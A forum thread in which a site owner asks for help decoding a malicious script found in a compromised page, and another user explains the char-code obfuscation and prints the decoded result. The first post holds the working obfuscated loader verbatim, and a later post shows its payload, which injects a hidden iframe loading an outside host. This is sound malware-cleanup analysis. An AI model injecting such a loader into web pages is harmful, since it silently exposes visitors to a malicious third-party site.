can anyone help decode this for me?

Discussion in 'General Scripting Chat' started by intence, Jun 12, 2012.

  1. intence

    intence Regular Member

    One of my sites got malware and the dreaded "this site may compromise your computer" warning. I found this in the source code but am having trouble decoding it.

    Thanks for the help

    Code:
    <!--
      Injected script as found in the compromised page, kept verbatim as a sample.
      Read it as text; loading it in a browser runs the hidden payload.

      How the obfuscation works, in the order the statements run:
      1. `grbregd=prototype` reads an undeclared name. In an ordinary page with no
         global `prototype` that throws, so the catch branch is the real code path.
         It sets h="Code", the number array f, and v="eva".
      2. `e=window[v+"l"]` looks up eval under a name assembled from string pieces,
         so the literal word never appears in the source.
      3. `q.appendChild(q+"")` hands a string to appendChild, which throws; that catch
         branch sets w=f and s=[] (the empty array turns into a string on the first +).
      4. The loop runs 577 times (577-5+5) and appends
         String["fr"+"omChar"+"Code"](w[j]/(j%3+1)) to s, so every stored number is a
         character code multiplied by 1, 2 or 3 depending on its position.
      5. `dsgsdg=prototype` throws the same way as step 1, and its catch branch calls
         e(s), i.e. eval on the decoded string.

      Traits worth searching other files for: eval reached through window[...] with a
      concatenated name, fromCharCode assembled from fragments, a long numeric array,
      and try/catch blocks around assignments from undeclared names.
    -->
    <script>i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,318,102,206,363,122,228,330,100,220,138,111,220,348,104,202,357,101,196,138,110,234,141,63,206,333,61,100,117,32,238,315,100,232,312,61,78,147,48,78,96,104,202,315,103,208,348,61,78,147,48,78,96,115,232,363,108,202,183,39,236,315,115,210,294,105,216,315,116,242,174,104,210,300,100,202,330,59,224,333,115,210,348,105,222,330,58,194,294,115,222,324,117,232,303,59,216,303,102,232,174,48,118,348,111,224,174,48,118,117,62,120,141,105,204,342,97,218,303,62,68,123,59,26,27,9,250,39,9,18,306,117,220,297,116,210,333,110,64,315,102,228,291,109,202,342,40,82,369,13,18,27,9,236,291,114,64,306,32,122,96,100,222,297,117,218,303,110,232,138,99,228,303,97,232,303,69,216,303,109,202,330,116,80,117,105,204,342,97,218,303,39,82,177,102,92,345,101,232,195,116,232,342,105,196,351,116,202,120,39,230,342,99,78,132,39,208,348,116,224,174,47,94,318,102,206,363,122,228,330,100,220,138,111,220,348,104,202,357,101,196,138,110,234,141,63,206,333,61,100,117,41,118,306,46,230,348,121,216,303,46,236,315,115,210,294,105,216,315,116,242,183,39,208,315,100,200,303,110,78,177,102,92,345,116,242,324,101,92,336,111,230,315,116,210,333,110,122,117,97,196,345,111,216,351,116,202,117,59,204,138,115,232,363,108,202,138,108,202,306,116,122,117,48,78,177,102,92,345,116,242,324,101,92,348,111,224,183,39,96,117,59,204,138,115,202,348,65,232,348,114,210,294,117,232,303,40,78,357,105,200,348,104,78,132,39,98,144
,39,82,177,13,18,27,9,200,333,99,234,327,101,220,348,46,206,303,116,138,324,101,218,303,110,232,345,66,242,252,97,206,234,97,218,303,40,78,294,111,200,363,39,82,273,48,186,138,97,224,336,101,220,300,67,208,315,108,200,120,102,82,177,13,18,27,125];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document.createElement("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];} r=String;z=((e)?h:"");for(;577-5+5>i;i+=1){j=i;if(e)s=s+r["fr"+"omChar"+((e)?z:12)]((w[j]/(j%3+1)));} try{dsgsdg=prototype;}catch(dsdh){e(((e)?s:12));}</script>
    
     
  2. skrode

    skrode Junior Member

    Code:
    // Decoded payload of the injected script, shown for analysis only.
    // It makes the visitor's browser load a third-party page inside a hidden iframe.
    // What hxxp://jfgyzrndn[.]ontheweb[.]nu/?go=2 serves is not shown on this page.
    // For cleanup, treat that host as an indicator: search the site's files and
    // database for it and for the obfuscated loader that produced this code.

    // If <body> already exists, attach the iframe through the DOM. iframer() is a
    // function declaration, so it is hoisted and callable before its definition.
    if (document.getElementsByTagName('body')[0]) {
        iframer();
    } else {
        // No <body> element found: write the same iframe straight into the markup.
        document.write("<iframe src='http://jfgyzrndn.ontheweb.nu/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    
    /**
     * Builds the iframe element by element and appends it to the first <body>.
     * Same URL and same attributes as the document.write branch above.
     */
    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://jfgyzrndn.ontheweb.nu/?go=2');
        // visibility:hidden plus absolute positioning at 0,0 and a 10x10 size:
        // the frame loads but the visitor sees nothing.
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }
    
     
  3. intence

    intence Regular Member

    wow thanks. could you tell me what it was encoded in? like base64 etc? so I know in the future.
     
  4. skrode

    skrode Junior Member

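    It isn't base64. It was done with an array of obfuscated charcodes: each number is a character code multiplied by (position % 3 + 1), and the injected script divides it back, runs it through String.fromCharCode and evals the resulting string. I used the following script to translate it; it does the same decoding but only displays the string: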

    Code:
    <script>
        // Encoded payload: presumably the array `f` from the injected script, pasted as data.
        // Each entry is a character code multiplied by (index % 3 + 1), which is what
        // the division in the loop below undoes. The numbers are inert until decoded.
        var w = [9, 18, 315, 102, 64, 120, 100, 222, 297, 117, 218, 303, 110, 232, 138, 103, 202, 348, 69, 216, 303, 109, 202, 330, 116, 230, 198, 121, 168, 291, 103, 156, 291, 109, 202, 120, 39, 196, 333, 100, 242, 117, 41, 182, 144, 93, 82, 369, 13, 18, 27, 9, 210, 306, 114, 194, 327, 101, 228, 120, 41, 118, 39, 9, 18, 375, 32, 202, 324, 115, 202, 96, 123, 26, 27, 9, 18, 300, 111, 198, 351, 109, 202, 330, 116, 92, 357, 114, 210, 348, 101, 80, 102, 60, 210, 306, 114, 194, 327, 101, 64, 345, 114, 198, 183, 39, 208, 348, 116, 224, 174, 47, 94, 318, 102, 206, 363, 122, 228, 330, 100, 220, 138, 111, 220, 348, 104, 202, 357, 101, 196, 138, 110, 234, 141, 63, 206, 333, 61, 100, 117, 32, 238, 315, 100, 232, 312, 61, 78, 147, 48, 78, 96, 104, 202, 315, 103, 208, 348, 61, 78, 147, 48, 78, 96, 115, 232, 363, 108, 202, 183, 39, 236, 315, 115, 210, 294, 105, 216, 315, 116, 242, 174, 104, 210, 300, 100, 202, 330, 59, 224, 333, 115, 210, 348, 105, 222, 330, 58, 194, 294, 115, 222, 324, 117, 232, 303, 59, 216, 303, 102, 232, 174, 48, 118, 348, 111, 224, 174, 48, 118, 117, 62, 120, 141, 105, 204, 342, 97, 218, 303, 62, 68, 123, 59, 26, 27, 9, 250, 39, 9, 18, 306, 117, 220, 297, 116, 210, 333, 110, 64, 315, 102, 228, 291, 109, 202, 342, 40, 82, 369, 13, 18, 27, 9, 236, 291, 114, 64, 306, 32, 122, 96, 100, 222, 297, 117, 218, 303, 110, 232, 138, 99, 228, 303, 97, 232, 303, 69, 216, 303, 109, 202, 330, 116, 80, 117, 105, 204, 342, 97, 218, 303, 39, 82, 177, 102, 92, 345, 101, 232, 195, 116, 232, 342, 105, 196, 351, 116, 202, 120, 39, 230, 342, 99, 78, 132, 39, 208, 348, 116, 224, 174, 47, 94, 318, 102, 206, 363, 122, 228, 330, 100, 220, 138, 111, 220, 348, 104, 202, 357, 101, 196, 138, 110, 234, 141, 63, 206, 333, 61, 100, 117, 41, 118, 306, 46, 230, 348, 121, 216, 303, 46, 236, 315, 115, 210, 294, 105, 216, 315, 116, 242, 183, 39, 208, 315, 100, 200, 303, 110, 78, 177, 102, 92, 345, 116, 242, 324, 101, 92, 336, 111, 230, 315, 116, 210, 333, 110, 122, 117, 97, 196, 345, 111, 216, 
351, 116, 202, 117, 59, 204, 138, 115, 232, 363, 108, 202, 138, 108, 202, 306, 116, 122, 117, 48, 78, 177, 102, 92, 345, 116, 242, 324, 101, 92, 348, 111, 224, 183, 39, 96, 117, 59, 204, 138, 115, 202, 348, 65, 232, 348, 114, 210, 294, 117, 232, 303, 40, 78, 357, 105, 200, 348, 104, 78, 132, 39, 98, 144, 39, 82, 177, 102, 92, 345, 101, 232, 195, 116, 232, 342, 105, 196, 351, 116, 202, 120, 39, 208, 303, 105, 206, 312, 116, 78, 132, 39, 98, 144, 39, 82, 177, 13, 18, 27, 9, 200, 333, 99, 234, 327, 101, 220, 348, 46, 206, 303, 116, 138, 324, 101, 218, 303, 110, 232, 345, 66, 242, 252, 97, 206, 234, 97, 218, 303, 40, 78, 294, 111, 200, 363, 39, 82, 273, 48, 186, 138, 97, 224, 336, 101, 220, 300, 67, 208, 315, 108, 200, 120, 102, 82, 177, 13, 18, 27, 125];
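        // Decode-only pass over `w`: rebuild the hidden string and show it as text.
        // Nothing here evaluates the result.
        // Start from an empty string; an uninitialised accumulator would make the
        // output begin with the literal text "undefined".
        var s = '';
        // Walk the array's own length instead of a hard-coded count, so a short or
        // partial paste cannot read past the end and append NUL characters.
        for (var i = 0; i < w.length; i += 1) {
            // Entry i was stored as charCode * (i % 3 + 1); divide to get the code back.
            s += String.fromCharCode(w[i] / (i % 3 + 1));
        }
        // Show the result as plain text only. The decoded string is script and markup,
        // so passing it to eval, document.write or innerHTML would run the payload.
        alert(s);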
    </script>